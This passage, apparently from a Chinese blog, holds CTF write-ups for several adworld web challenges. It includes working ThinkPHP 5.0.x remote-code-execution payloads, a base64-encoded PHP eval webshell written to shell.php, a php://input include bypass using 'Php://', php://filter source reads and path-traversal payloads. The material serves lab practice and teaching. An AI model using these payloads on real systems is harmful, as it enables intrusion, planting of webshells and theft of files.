<h2 id="php_rce"><a class="markdownIt-Anchor" href="#php_rce"></a> php_rce</h2>
<p>ThinkPHP漏洞利用。</p>
<p>github有漏洞合集。<a target="_blank" rel="noopener" href="https://github.com/SkyBlueEternal/thinkphp-RCE-POC-Collection">SkyBlueEternal/thinkphp-RCE-POC-Collection: thinkphp v5.x 远程代码执行漏洞-POC集合 (github.com)</a></p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">index.php?s=index<span class="hljs-regexp">/\think\module/</span>action<span class="hljs-regexp">/param1/</span><span class="hljs-variable">$&#123;@phpinfo()&#125;</span><br></code></pre></td></tr></table></figure>
<p>随便找一个paylaod，试一下，得到准确版本。V5.0.20</p>
<p><img src="https://upyun.wuuconix.link/image-20210924131002896.png" srcset="/img/loading.gif" lazyload alt="ThinkPHP V5.0.20" /></p>
<p>利用github里的5.0.21的命令执行漏洞即可。</p>
<p><img src="https://upyun.wuuconix.link/image-20210924131035489.png" srcset="/img/loading.gif" lazyload alt="5.0.21" /></p>
<figure class="highlight matlab"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs matlab">?s=index/\think\app/invokefunction&amp;<span class="hljs-function"><span class="hljs-keyword">function</span>=<span class="hljs-title">call_user_func_array</span>&amp;<span class="hljs-title">vars</span><span class="hljs-params">[0]</span>=<span class="hljs-title">system</span>&amp;<span class="hljs-title">vars</span><span class="hljs-params">[1]</span><span class="hljs-params">[]</span>=<span class="hljs-title">id</span></span><br></code></pre></td></tr></table></figure>
<p><img src="https://upyun.wuuconix.link/image-20210924131128290.png" srcset="/img/loading.gif" lazyload alt="id" /></p>
<p>观察payload，发现运行的命令就是最后的<code>id</code>。只需要在这里改成其他的命令，我们就能命令执行了。</p>
<figure class="highlight matlab"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs matlab">?s=index/\think\app/invokefunction&amp;<span class="hljs-function"><span class="hljs-keyword">function</span>=<span class="hljs-title">call_user_func_array</span>&amp;<span class="hljs-title">vars</span><span class="hljs-params">[0]</span>=<span class="hljs-title">system</span>&amp;<span class="hljs-title">vars</span><span class="hljs-params">[1]</span><span class="hljs-params">[]</span>=<span class="hljs-title">ls</span> /</span><br></code></pre></td></tr></table></figure>
<p><img src="https://upyun.wuuconix.link/image-20210924131235041.png" srcset="/img/loading.gif" lazyload alt="ls /" /></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">?s=index/\think\app/invokefunction&amp;<span class="hljs-keyword">function</span>=call_user_func_array&amp;vars[0]=system&amp;vars[1][]=<span class="hljs-built_in">cat</span> /flag<br></code></pre></td></tr></table></figure>
<p><img src="https://upyun.wuuconix.link/image-20210924131311859.png" srcset="/img/loading.gif" lazyload alt="ctf" /></p>
<p>得到flag后我还尝试了以下写木马2333。之前很多题都不能写，估计设置了权限。这道题可以。</p>
<p>首先把一句话木马base64加密一下，防止写文件时<code>$</code>被shell认为是特殊符号的问题（当然用单引号也可解决这个问题）</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-keyword">echo</span> <span class="hljs-string">&#x27;&lt;?php @eval($_POST[&quot;wuuconix&quot;]);?&gt;&#x27;</span> | base64<br></code></pre></td></tr></table></figure>
<p><img src="https://upyun.wuuconix.link/image-20210924132005557.png" srcset="/img/loading.gif" lazyload alt="base64" /></p>
<p>然后写文件。</p>
<figure class="highlight vim"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs vim">?s=<span class="hljs-built_in">index</span>/\think\app/invokefunction&amp;<span class="hljs-keyword">function</span>=call_user_func_array&amp;vars[<span class="hljs-number">0</span>]=<span class="hljs-built_in">system</span>&amp;vars[<span class="hljs-number">1</span>][]=<span class="hljs-keyword">echo</span> <span class="hljs-string">&#x27;PD9waHAgQGV2YWwoJF9QT1NUWyJ3dXVjb25peCJdKTs/Pgo=&#x27;</span> | base64 -d &gt; <span class="hljs-keyword">shell</span>.php<br></code></pre></td></tr></table></figure>
<p>成功连接。</p>
<p><img src="https://upyun.wuuconix.link/image-20210924132157620.png" srcset="/img/loading.gif" lazyload alt="get shell" /></p>
<p>我们可以看见Thinkphp的网站根目录是在<code>/var/www/public</code>里的。</p>
<h2 id="web_php_include"><a class="markdownIt-Anchor" href="#web_php_include"></a> Web_php_include</h2>
<p>这道题考察伪协议<code>php://input</code>的利用。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-title function_ invoke__">show_source</span>(<span class="hljs-keyword">__FILE__</span>);<br><span class="hljs-keyword">echo</span> <span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;hello&#x27;</span>];<br><span class="hljs-variable">$page</span>=<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;page&#x27;</span>];<br><span class="hljs-keyword">while</span> (<span class="hljs-title function_ invoke__">strstr</span>(<span class="hljs-variable">$page</span>, <span class="hljs-string">&quot;php://&quot;</span>)) &#123;<br>    <span class="hljs-variable">$page</span>=<span class="hljs-title function_ invoke__">str_replace</span>(<span class="hljs-string">&quot;php://&quot;</span>, <span class="hljs-string">&quot;&quot;</span>, <span class="hljs-variable">$page</span>);<br>&#125;<br><span class="hljs-keyword">include</span>(<span class="hljs-variable">$page</span>);<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>
<p><code>include</code>函数的参数是一个文件名，也就是我们可以控制包含的一个文件名。但是显然，我们知道的文件只有<code>index.php</code>本身，自己包含自己没有意思，我们最好能够包含一个可以执行命令的php文件。</p>
<p><code>php://input</code>伪协议就可以帮助我们实现这个想法，它可以读取一个数据流。这个输入流是用POST方式传递的。</p>
<p>也就是这样一个过程。</p>
<ol>
<li>我们往page里写<code>php://input</code>，同时POST传递我们自己的php代码。</li>
<li>index.php include的时候发现，这不是普通的文件名，而是一个数据流，就把我们POST发送的php代码给包含了，这就实现了远程命令执行。</li>
</ol>
<p><code>php://input</code>生效的条件是<code>allow_url_fopen</code>和<code>allow_url_include</code>都设置为<code>On</code>。</p>
<p>题目其实还给了个phpinfo.php文件，这是后来命令执行的时候发现的，下次做题还是得先扫，掌握更多的信息。</p>
<p><img src="https://upyun.wuuconix.link/image-20210926132029194.png" srcset="/img/loading.gif" lazyload alt="phpinfo" /></p>
<p>同时考虑到这道题对<code>php://</code>进行了循环检测，一直置空，普通的双拼是无法绕过的。但是它用的<code>strstr</code>函数和<code>stristr</code>，大小写敏感，所以我们用<code>Php://</code>大写绕过即可。</p>
<p><img src="https://upyun.wuuconix.link/image-20210926132339093.png" srcset="/img/loading.gif" lazyload alt="rce" /></p>
<p>这道题最后<code>cat fl4gisisish3re.php</code>的时候，是看不到flag的，因为这个文件它内部是一个php的赋值语句，index.php include之后，没有echo 语句，照样看不到。有两种方法解决。</p>
<ol>
<li>
<p>cat 的时候加上base64加密。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-comment"># POST</span><br><span class="hljs-meta">&lt;?php</span> <span class="hljs-title function_ invoke__">system</span>(<span class="hljs-string">&quot;cat fl4gisisish3r3.php | base64&quot;</span>); <span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>
</li>
<li>
<p>利用php://filter 直接读base64加密后的源码。</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">?page=Php:<span class="hljs-regexp">//</span>filter<span class="hljs-regexp">/read=convert.base64-encode/</span>resource=fl4gisisish3r3.php<br></code></pre></td></tr></table></figure>
</li>
</ol>
<p>此外，其实这道题按理还有一种做法，那就是远程包含一个url文件。</p>
<p>但是这道题输入一个url后直接崩溃了，不知道什么情况。我在我服务器上尝试是可以的。</p>
<p><img src="https://upyun.wuuconix.link/image-20210926133041772.png" srcset="/img/loading.gif" lazyload alt="url include" /></p>
<h2 id="ics-06"><a class="markdownIt-Anchor" href="#ics-06"></a> ics-06</h2>
<p>描述：云平台报表中心收集了设备管理基础服务的数据，但是数据被删除了，只有一处留下了入侵者的痕迹。</p>
<p>页面有个id。</p>
<p><img src="https://upyun.wuuconix.link/image-20210926160424518.png" srcset="/img/loading.gif" lazyload alt="id" /></p>
<p>sql注入做多了，就以为是注入，但是手动试了很多都不行，没有回显，用sleep函数也失效。貌似输入除了非数字的都会跳转到<code>id=1</code>。因为它的标头里有个<code>Localtion</code>。</p>
<p><img src="https://upyun.wuuconix.link/image-20210926160630863.png" srcset="/img/loading.gif" lazyload alt="Location" /></p>
<p>自然sqlmap也扫不出来。</p>
<p>无奈看wp，看到一半突然知道直接爆破id即可。</p>
<p>当id为2333时，即可获得flag。</p>
<p><img src="https://upyun.wuuconix.link/image-20210926160752587.png" srcset="/img/loading.gif" lazyload alt="ctf" /></p>
<h2 id="warmup"><a class="markdownIt-Anchor" href="#warmup"></a> warmup</h2>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br>    <span class="hljs-title function_ invoke__">highlight_file</span>(<span class="hljs-keyword">__FILE__</span>);<br>    <span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">emmm</span></span><br><span class="hljs-class">    </span>&#123;<br>        <span class="hljs-keyword">public</span> <span class="hljs-built_in">static</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">checkFile</span>(<span class="hljs-params">&amp;<span class="hljs-variable">$page</span></span>)</span><br><span class="hljs-function">        </span>&#123;<br>            <span class="hljs-variable">$whitelist</span> = [<span class="hljs-string">&quot;source&quot;</span>=&gt;<span class="hljs-string">&quot;source.php&quot;</span>,<span class="hljs-string">&quot;hint&quot;</span>=&gt;<span class="hljs-string">&quot;hint.php&quot;</span>];<br>            <span class="hljs-keyword">if</span> (! <span class="hljs-keyword">isset</span>(<span class="hljs-variable">$page</span>) || !<span class="hljs-title function_ invoke__">is_string</span>(<span class="hljs-variable">$page</span>)) &#123;<br>                <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;you can&#x27;t see it&quot;</span>;<br>                <span class="hljs-keyword">return</span> <span class="hljs-literal">false</span>;<br>            &#125;<br><br>            <span class="hljs-keyword">if</span> (<span class="hljs-title function_ invoke__">in_array</span>(<span class="hljs-variable">$page</span>, <span class="hljs-variable">$whitelist</span>)) &#123;<br>                <span class="hljs-keyword">return</span> <span class="hljs-literal">true</span>;<br>            &#125;<br><br>            <span class="hljs-variable">$_page</span> = <span class="hljs-title function_ invoke__">mb_substr</span>(<br>                <span class="hljs-variable">$page</span>,<br>                <span class="hljs-number">0</span>,<br>                <span class="hljs-title function_ invoke__">mb_strpos</span>(<span class="hljs-variable">$page</span> . <span class="hljs-string">&#x27;?&#x27;</span>, <span class="hljs-string">&#x27;?&#x27;</span>)<br>            );<br>            <span class="hljs-keyword">if</span> (<span class="hljs-title function_ invoke__">in_array</span>(<span class="hljs-variable">$_page</span>, <span class="hljs-variable">$whitelist</span>)) &#123;<br>                <span class="hljs-keyword">return</span> <span class="hljs-literal">true</span>;<br>            &#125;<br><br>            <span class="hljs-variable">$_page</span> = <span class="hljs-title function_ invoke__">urldecode</span>(<span class="hljs-variable">$page</span>);<br>            <span class="hljs-variable">$_page</span> = <span class="hljs-title function_ invoke__">mb_substr</span>(<br>                <span class="hljs-variable">$_page</span>,<br>                <span class="hljs-number">0</span>,<br>                <span class="hljs-title function_ invoke__">mb_strpos</span>(<span class="hljs-variable">$_page</span> . <span class="hljs-string">&#x27;?&#x27;</span>, <span class="hljs-string">&#x27;?&#x27;</span>)<br>            );<br>            <span class="hljs-keyword">if</span> (<span class="hljs-title function_ invoke__">in_array</span>(<span class="hljs-variable">$_page</span>, <span class="hljs-variable">$whitelist</span>)) &#123;<br>                <span class="hljs-keyword">return</span> <span class="hljs-literal">true</span>;<br>            &#125;<br>            <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;you can&#x27;t see it&quot;</span>;<br>            <span class="hljs-keyword">return</span> <span class="hljs-literal">false</span>;<br>        &#125;<br>    &#125;<br><br>    <span class="hljs-keyword">if</span> (! <span class="hljs-keyword">empty</span>(<span class="hljs-variable">$_REQUEST</span>[<span class="hljs-string">&#x27;file&#x27;</span>])<br>        &amp;&amp; <span class="hljs-title function_ invoke__">is_string</span>(<span class="hljs-variable">$_REQUEST</span>[<span class="hljs-string">&#x27;file&#x27;</span>])<br>        &amp;&amp; emmm::<span class="hljs-title function_ invoke__">checkFile</span>(<span class="hljs-variable">$_REQUEST</span>[<span class="hljs-string">&#x27;file&#x27;</span>])<br>    ) &#123;<br>        <span class="hljs-keyword">include</span> <span class="hljs-variable">$_REQUEST</span>[<span class="hljs-string">&#x27;file&#x27;</span>];<br>        <span class="hljs-keyword">exit</span>;<br>    &#125; <span class="hljs-keyword">else</span> &#123;<br>        <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;&lt;br&gt;&lt;img src=\&quot;https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\&quot; /&gt;&quot;</span>;<br>    &#125;  <br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>
<p>这道题之前刚接触ctf的时候做过，当时很难理解。现在很好理解了。</p>
<p>首先这道题有个<code>hint.php</code>，提示flag在<code>ffffllllaaaagggg</code></p>
<p><img src="https://upyun.wuuconix.link/image-20210926162915376.png" srcset="/img/loading.gif" lazyload alt="hint" /></p>
<p>而<code>souce.php</code>中有<code>include</code>文件包含函数，我们可以想办法绕过，然后去包含这个flag文件即可。</p>
<p>题目中有这样一个语句</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-variable">$_page</span> = <span class="hljs-title function_ invoke__">mb_substr</span>(<span class="hljs-variable">$page</span>,<span class="hljs-number">0</span>,<span class="hljs-title function_ invoke__">mb_strpos</span>(<span class="hljs-variable">$page</span> . <span class="hljs-string">&#x27;?&#x27;</span>, <span class="hljs-string">&#x27;?&#x27;</span>))<br></code></pre></td></tr></table></figure>
<p>也就是把你传的哪个文件名里问号前面的部分截取出来（如果没有问号就全取）。但是一般来说正常文件名也没有问号呀2333，所以这道题还是挺刻意的。</p>
<p>它会去验证问好前面的部分是不是<code>source.php</code>或者<code>hint.php</code>，只有这两个文件是白名单。</p>
<p>那么很显然payload就是这样的。</p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs routeros">?<span class="hljs-attribute">file</span>=hint.php?../ffffllllaaaagggg<br></code></pre></td></tr></table></figure>
<p>但是非常可惜，没有输出。</p>
<p>被迫看wp，原来这个flag文件在根目录下，hint倒是说清楚呀2333。</p>
<figure class="highlight gradle"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs gradle">?<span class="hljs-keyword">file</span>=hint.php?..<span class="hljs-regexp">/../</span>..<span class="hljs-regexp">/../</span>../ffffllllaaaagggg<br></code></pre></td></tr></table></figure>
<p><img src="https://upyun.wuuconix.link/image-20210926163418564.png" srcset="/img/loading.gif" lazyload alt="ctf" /></p>
<p>同时这道题还可以二次url加密，形成一个payload，没啥意思。也能得到flag。</p>
<p><img src="https://upyun.wuuconix.link/image-20210926163503474.png" srcset="/img/loading.gif" lazyload alt="二次url加密" /></p>
<p>这道题让我比较感兴趣的一点在于目录遍历的时候，文件名后加个<code>?</code>竟然能够毫无阻碍得继续向上级目录进发，仿佛没有这个问号似的。</p>
<p>在linux里是无法实现类似操作的。</p>
<p><img src="https://upyun.wuuconix.link/image-20210926163715763.png" srcset="/img/loading.gif" lazyload alt="cd tools?/../" /></p>
<p>我用本地环境试了一下，发现还蛮有道理的。</p>
<figure class="highlight gradle"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs gradle">?<span class="hljs-keyword">file</span>=poc.py..<span class="hljs-regexp">/../</span>..<span class="hljs-regexp">/../</span>..<span class="hljs-regexp">/../</span>flag<br></code></pre></td></tr></table></figure>
<p><img src="https://upyun.wuuconix.link/image-20210926164353616.png" srcset="/img/loading.gif" lazyload alt="正常1" /></p>
<figure class="highlight gradle"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs gradle">?<span class="hljs-keyword">file</span>=poc.py?..<span class="hljs-regexp">/../</span>..<span class="hljs-regexp">/../</span>..<span class="hljs-regexp">/../</span>flag<br></code></pre></td></tr></table></figure>
<p><img src="https://upyun.wuuconix.link/image-20210926164441093.png" srcset="/img/loading.gif" lazyload alt="正常2" /></p>
<p>这是为什么呢？看完下一个payload你就懂了。</p>
<figure class="highlight gradle"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs gradle">?<span class="hljs-keyword">file</span>=poc.py?sdjfljdflsldfjasklfjweiohfuuwejvsdv6513544..<span class="hljs-regexp">/../</span>..<span class="hljs-regexp">/../</span>..<span class="hljs-regexp">/../</span>flag<br></code></pre></td></tr></table></figure>
<p><img src="https://upyun.wuuconix.link/image-20210926164602990.png" srcset="/img/loading.gif" lazyload alt="正常2" /></p>
<p><a target="_blank" rel="noopener" href="http://xn--poc-lp6eu21c.py?%E5%90%8E%E9%9D%A2%E5%8F%88%E4%B9%B1%E6%89%93%E4%BA%86%E4%B8%80%E5%A0%86%E4%B8%9C%E8%A5%BF%E4%BB%8D%E7%84%B6%E8%83%BD%E5%A4%9F%E6%AD%A3%E5%B8%B8%E5%BE%97%E5%88%B0flag%E3%80%82">我在poc.py?后面又乱打了一堆东西仍然能够正常得到flag。</a></p>
<p>实际上在php眼里这几个paylaod都是一样的，因为它们都是通过当前目录下的某个文件，一开始是<code>poc.py</code>,然后是<code>poc.py?</code>，最后是<code>poc.py?sdjfljdflsldfjasklfjweiohfuuwejvsdv6513544</code>，来进入上级目录，我们这种目录遍历的形式实际上把哪个文件看成了文件夹。</p>
<p>所以这时哪个文件具体的内容，甚至说存不存在这个文件都已经没有关系了，因为我们只是把它当跳板，显然php也是这么想的。</p>
<p>所以我们在这道题里输的<code>source.php?</code>，php会把它看成一个文件夹，虽然它不存在，而我们以这个虚空的文件夹为基础跳板，得到了根目录下的flag。</p>
<h2 id="web2"><a class="markdownIt-Anchor" href="#web2"></a> web2</h2>
<p>看似是一道web题，实际上是一道密码题2333。对应写出逆就行了。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-variable">$miwen</span>=<span class="hljs-string">&quot;a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws&quot;</span>;<br><br><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">encode</span>(<span class="hljs-params"><span class="hljs-variable">$str</span></span>)</span>&#123;<br>    <span class="hljs-variable">$_o</span>=<span class="hljs-title function_ invoke__">strrev</span>(<span class="hljs-variable">$str</span>);<br>    <span class="hljs-comment">// echo $_o;</span><br>        <br>    <span class="hljs-keyword">for</span>(<span class="hljs-variable">$_0</span>=<span class="hljs-number">0</span>;<span class="hljs-variable">$_0</span>&lt;<span class="hljs-title function_ invoke__">strlen</span>(<span class="hljs-variable">$_o</span>);<span class="hljs-variable">$_0</span>++)&#123;<br>       <br>        <span class="hljs-variable">$_c</span>=<span class="hljs-title function_ invoke__">substr</span>(<span class="hljs-variable">$_o</span>,<span class="hljs-variable">$_0</span>,<span class="hljs-number">1</span>);<br>        <span class="hljs-variable">$__</span>=<span class="hljs-title function_ invoke__">ord</span>(<span class="hljs-variable">$_c</span>)+<span class="hljs-number">1</span>;<br>        <span class="hljs-variable">$_c</span>=<span class="hljs-title function_ invoke__">chr</span>(<span class="hljs-variable">$__</span>);<br>        <span class="hljs-variable">$_</span>=<span class="hljs-variable">$_</span>.<span class="hljs-variable">$_c</span>;   <br>    &#125; <br>    <span class="hljs-keyword">return</span> <span class="hljs-title function_ invoke__">str_rot13</span>(<span class="hljs-title function_ invoke__">strrev</span>(<span class="hljs-title function_ invoke__">base64_encode</span>(<span class="hljs-variable">$_</span>)));<br>&#125;<br><br><span class="hljs-title function_ invoke__">highlight_file</span>(<span class="hljs-keyword">__FILE__</span>);<br><span class="hljs-comment">/*</span><br><span class="hljs-comment">   逆向加密算法，解密$miwen就是flag</span><br><span class="hljs-comment">*/</span><br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>
<p>解密脚本</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br>        <span class="hljs-variable">$miwen</span>=<span class="hljs-string">&quot;a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws&quot;</span>;<br>        <span class="hljs-variable">$_</span> = <span class="hljs-title function_ invoke__">base64_decode</span>((<span class="hljs-title function_ invoke__">strrev</span>(<span class="hljs-title function_ invoke__">str_rot13</span>(<span class="hljs-variable">$miwen</span>))));<br>        <span class="hljs-variable">$_o</span> = <span class="hljs-string">&quot;&quot;</span>;<br>        <span class="hljs-keyword">for</span> (<span class="hljs-variable">$i</span> = <span class="hljs-title function_ invoke__">strlen</span>(<span class="hljs-variable">$_</span>); <span class="hljs-variable">$i</span> &gt;= <span class="hljs-number">0</span>; <span class="hljs-variable">$i</span>--) &#123;<br>                <span class="hljs-variable">$_c</span> = <span class="hljs-title function_ invoke__">substr</span>(<span class="hljs-variable">$_</span>, <span class="hljs-variable">$i</span>, <span class="hljs-number">1</span>);<br>                <span class="hljs-variable">$_o</span> = <span class="hljs-title function_ invoke__">chr</span>(<span class="hljs-title function_ invoke__">ord</span>(<span class="hljs-variable">$_c</span>) - <span class="hljs-number">1</span>) . <span class="hljs-variable">$_o</span>;<br>        &#125;<br>        <span class="hljs-variable">$_o</span> = <span class="hljs-title function_ invoke__">strrev</span>(<span class="hljs-variable">$_o</span>);<br>        <span class="hljs-keyword">echo</span> <span class="hljs-variable">$_o</span>;<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>
<p><img src="https://upyun.wuuconix.link/image-20211031223227219.png" srcset="/img/loading.gif" lazyload alt="flag" /></p>
<p>这里发现了一个有趣的函数，str_rot13，实际上就是移位密码，每个字母往后移13位。因为字母个数是26位，所以再移一次就移回来了，故其逆函数就是本身。</p>
<link rel="stylesheet" href="/css/spoiler.css" type="text/css"><script src="/js/spoiler.js" type="text/javascript" async></script>
                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/ctf/">#ctf</a>
      
        <a href="/tags/writeup/">#writeup</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>攻防世界刷题笔记</div>
      <div>https://wuuconix.link/2021/09/23/adworld/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>wuuconix</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2021年9月23日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2021/09/29/exgcd/" title="模逆——拓展欧几里得">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">模逆——拓展欧几里得</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2021/09/12/lilac/" title="Lilac纳新赛web部分题目wp">
                        <span class="hidden-mobile">Lilac纳新赛web部分题目wp</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
  
  
    <article id="comments" lazyload>
      
  <div id="valine"></div>
  <script type="text/javascript">
    Fluid.utils.loadComments('#valine', function() {
      Fluid.utils.createScript('https://lib.baomitu.com/valine/1.4.16/Valine.min.js', function() {
        var options = Object.assign(
          {"appId":"tHbt1wElFiuw8zrDBIEUsNIv-gzGzoHsz","appKey":"ztzeLh1CDeUvYk1YrI8bK8kW","path":"window.location.pathname","placeholder":"留下一条友善的评论吧","avatar":"retro","meta":["nick","mail","link"],"requiredFields":[],"pageSize":10,"lang":"zh-CN","highlight":false,"recordIP":false,"serverURLs":"","emojiCDN":null,"emojiMaps":null,"enableQQ":false},
          {
            el: "#valine",
            path: window.location.pathname
          }
        )
        new Valine(options);
        Fluid.utils.waitElementVisible('#valine .vcontent', () => {
          var imgSelector = '#valine .vcontent img:not(.vemoji)';
          Fluid.plugins.imageCaption(imgSelector);
          Fluid.plugins.fancyBox(imgSelector);
        })
      });
    });
  </script>
  <noscript>Please enable JavaScript to view the comments</noscript>


    </article>
  


          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  



  <script>
  Fluid.utils.createScript('https://lib.baomitu.com/mermaid/8.13.10/mermaid.min.js', function() {
    mermaid.initialize({"theme":"default"});

    Fluid.events.registerRefreshCallback(function() {
      if ('mermaid' in window) {
        mermaid.init();
      }
    });
  });
</script>






    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a><br> <span>本网站由 <a href="https://www.upyun.com/?utm_source=lianmeng&utm_medium=referral" target="_blank""><img src="https://upyun.wuuconix.link/upyun.png" srcset="/img/loading.gif" lazyload width="53" height="18" style="fill: currentColor;"/></a> 提供 CDN 加速/云存储服务</span> 
    </div>
  
  
    <div class="statistics">
  
  

  
    
      <span id="leancloud-site-pv-container" style="display: none">
        总访问量 
